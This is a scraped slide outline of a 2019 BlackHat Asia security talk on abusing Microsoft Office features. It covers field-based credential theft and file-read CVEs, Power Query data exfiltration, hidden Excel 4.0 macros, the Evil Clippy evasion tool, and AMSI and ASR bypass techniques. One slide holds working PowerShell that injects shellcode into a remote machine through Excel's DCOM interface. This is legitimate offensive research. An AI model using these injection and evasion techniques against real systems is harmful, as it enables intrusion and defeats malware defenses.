MS Office in Wonderland

2020-03-01 467浏览

  • 1.MS OFFICE IN WONDERLAND Stan Hegt & Pieter Ceelen BlackHat Asia, March 2019
  • 2.Pieter Stan Most MS Office malware focusses on well-known tricks such as DDE and VBA macros. But there is so much more functionality in Word and Excel that can be abused. We’ll take you on a journey down the rabbit hole!
  • 3.WHO NEEDS CODE EXECUTION ANYWAY?
  • 4.ABOUT FIELDS www.outflank.nl 3
  • 5.INCLUDEPICTURE www.outflank.nl 4
  • 6.CREDENTIAL THEFT CVE-2019-0540
  • 7.CVE-2019-0540 – CREDENTIAL THEFT - In the header of a DotX file - INCLUDEPICTURE URL is made dynamic by adding the USERNAME field - Word does not continue loading as long as picture is not loaded www.outflank.nl 6
  • 8.ARBITRARY FILE READ CVE-2019-0561
  • 9.CVE-2019-0561 – ARBITRARY FILE READING (1/2) A revisit to CVE2002-1143 In 2002, an includetext could read an arbitrary file. MSFix:the includetext field is not updated in various events and as such is no longer dynamic. Or is it still ...? www.outflank.nl 8
  • 10.CVE-2019-0561 – ARBITRARY FILE READING (2/2) www.outflank.nl 9
  • 11.MITIGATION www.outflank.nl 10
  • 12.MEET M GET&TRANSFROM ABUSE
  • 13.GIVE ME THE POWER! Fields are old school and patched… Now same tricks with new school techniques www.outflank.nl 12
  • 14.STEALING UNATTEND.XML . GET&TRANSFORM query definition in M, retrieves unattend.xml ColumnA:Retrieving data from file (GET&TRANSFORM) www.outflank.nl ColumnB:Posting results (WEBSERVICE, max 2048 chars)
  • 15.WHAT ELSE CAN BE DONE? Ongoing research, there is a lot more to retrieve using this feature www.outflank.nl 14
  • 16.WHO NEEDS VBA FOR MACROS ANYWAY?
  • 17.ENTERING THE MACRO RABBIT HOLE VBA != Macros There are at least two macro languages supported by MS Office • Visual Basic for Applications (VBA) • Excel 4.0 macro’s (XLM, only in Excel) VBA != VBA For VBA there are 2 intermediary languages • P-code • Exe-codes www.outflank.nl 16
  • 18.HOW TO INSERT AN XLM MACRO www.outflank.nl 17
  • 19.EXCEL 4.0 MACRO KUNG FUhttps://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/www.outflank.nl 18
  • 20.HIDING YOUR EXCEL 4.0 MACRO www.outflank.nl 19
  • 21.HIDING YOUR EXCEL 4.0 MACRO Can be achieved with one line ofVBA:ActiveSheet.Visible = xlSheetVeryHidden Then remove VBA code and save the Excel file www.outflank.nl 20
  • 22.AV INDUSTRY FORGOT ABOUT 1992 TECHNOLOGY www.outflank.nl 21
  • 23.XLM VIA SYLK XLM macros also supported in SYLK files • Text-based file format which originates from the 80s • SYLK (.slk) files never open in protected mode sandbox! • Turned out to be an RCE on MS Office 2011 for Mac (won’t fix) Integrated into SharpShooter byMDSec:https://github.com/mdsecactivebreach/SharpShooter/blob/master/modules/excel4.pywww.outflank.nl 22
  • 24.XLM EXPOSURE VIA (D)COM Shellcode injection into remote system with XLM via ExecuteExcel4Macro $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "server01")); $memaddr = $excel.ExecuteExcel4Macro('CALL("Kernel32","VirtualAlloc","JJJJJ",0,833,4096,64)'); $ret = $excel.ExecuteExcel4Macro('CALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, ' + ($memaddr + 0) + ', ' + "CHAR`(252`)" + ', 1, 0)’); ... $ret = $excel.ExecuteExcel4Macro('CALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, ' + ($memaddr + 832) + ', ' + "CHAR`(232`)" + ', 1, 0)'); $excel.ExecuteExcel4Macro('CALL("Kernel32","CreateThread","JJJJJJJ",0, 0, ' + $memaddr + ', 0, 0, 0)’); Powershell and Cobalt Strike implementations availableat:https://github.com/outflanknl/Excel4-DCOMwww.outflank.nl 23
  • 25.P-CODE www.outflank.nl 24
  • 26.INTRODUCING EVIL CLIPPY It looks like your maldoc does not yet bypass AV. Do you want me to help?https://github.com/outflanknl/EvilClippywww.outflank.nl 25
  • 27.EVIL CLIPPY FEATURES Current features • Cross-platform (runs on OSX, Linux, Windows) • Hide macros from GUI editor • Fool analyst tools by removing module names • VBA stomping (p-code abuse) • Serve payloads via HTTP templates Available athttps://github.com/outflanknl/EvilClippywww.outflank.nl 26
  • 28.HOW EFFECTIVE IS THIS? (BEFORE CLIPPY) www.outflank.nl 27
  • 29.HOW EFFECTIVE IS THIS? (AFTER CLIPPY) www.outflank.nl 28
  • 30.BYPASSING MODERNDEFENSES:AMSI & ASR
  • 31.VBA & ANTIMALWARE SCANNING INTERFACE Any COM method or Specific triggers Win32 API call (Shell etc) AMSI also catches pcodeMacroRuntimeScope:Disable, Low Trust documents, All documents www.outflank.nl 30
  • 32.BYPASSING AMSI FOR MACROS Technique Example Procedures Abuse non-VBA functionality • • Fields & Powerquery Excel 4.0 macros Execution outside of MacroRuntimeScope • Drop malicious code into trusted locations Non-trigger COM & Win32 API functions • • Application.ExecuteExcel4macro CreateObject ”Excel.application” and calling DDEInitialize WMI Spawninstance • VBA functions that are not in AMSI logs (not COM & not Win32 API) www.outflank.nl • • Application.Sendkeys A macro creates a .bat and .reg in startup by using Word saveas .txt, reg key disables AMSI by altering MacroRuntimeScope 31
  • 33.ATTACK SURFACE REDUCTION RULES Rules enforced by Windows Defender Exploit Guard Block Win32 API calls from Office macro (static rule)Bypass:'>Bypass: